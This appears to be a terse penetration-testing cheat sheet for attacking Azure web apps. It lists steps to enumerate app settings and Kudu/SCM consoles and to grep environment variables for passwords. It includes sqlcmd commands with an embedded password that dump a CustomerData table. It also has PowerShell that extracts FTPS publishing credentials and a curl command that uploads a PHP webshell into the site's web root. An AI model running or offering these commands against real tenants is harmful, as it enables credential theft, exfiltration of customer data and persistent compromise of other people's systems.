You probably need info from resource_enumeration first
Enumeration
Get info about a webapp resource
(Get-AzWebApp -ResourceGroupName 'group' -Name 'companyports-site').SiteConfigGet-AzWebApp -Name megabigtechdevapp23Static webapps:
Get info
az staticwebapp show --name 'name' --resource-group 'dat group'Get settings (properties will sometimes contain sensitive info like conn strings)
az staticwebapp appsettings list --name 'name' --resource-group 'dat group'Kudu / SCM
This is a separate dev container from prod, have management stuff.
prod --> companyapp.azurewebsites.net
kudu/scm --> companyapp.scm.azurewebsites.netYou need the Website Contributor roles to utilize
Exploitation
If you can login, do to debug ⇒ powershell Then: managed_identity_and_apps
OR
find connection strings etc..
env | findstr 'password'Find DB? do this from powershell session on kudu
sqlcmd -S megabigdevsqlserver.database.windows.net -U dbuser -P 'V%#J3c5jceryjcE' -d customerdevneddb -Q "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'"Read table
sqlcmd -S megabigdevsqlserver.database.windows.net -U dbuser -P 'V%#J3c5jceryjcE' -d customerdevneddb -Q "SELECT * FROM CustomerData"Retrieve the FTPS deployment URL, username and password:
$webAppName = "<company-domain-portal>"
$resourceGroupName = "<groupname>"
$publishingProfileXml = [xml](Get-AzWebAppPublishingProfile -Name $webAppName -ResourceGroupName $resourceGroupName -OutputFile null)
$username = $publishingProfileXml.SelectSingleNode("//publishData/publishProfile[@publishMethod='MSDeploy']").userName
$password = $publishingProfileXml.SelectSingleNode("//publishData/publishProfile[@publishMethod='MSDeploy']").userPWD
$ftpsProfile = $publishingProfileXml.SelectSingleNode("//publishData/publishProfile[@publishMethod='FTP']")
$ftpsUrl = $ftpsProfile.publishUrl
$username
$password
$ftpsUrlyou can then upload a webshell or whatever you want via curl.
curl -T shell.php --ssl ftps://<company-domain-portal>.ftp.azurewebsites.windows.net/site/wwwroot/portal/shell.php --user '<PublishingUsername>'Flames
Azure webapps have Defender OFF by default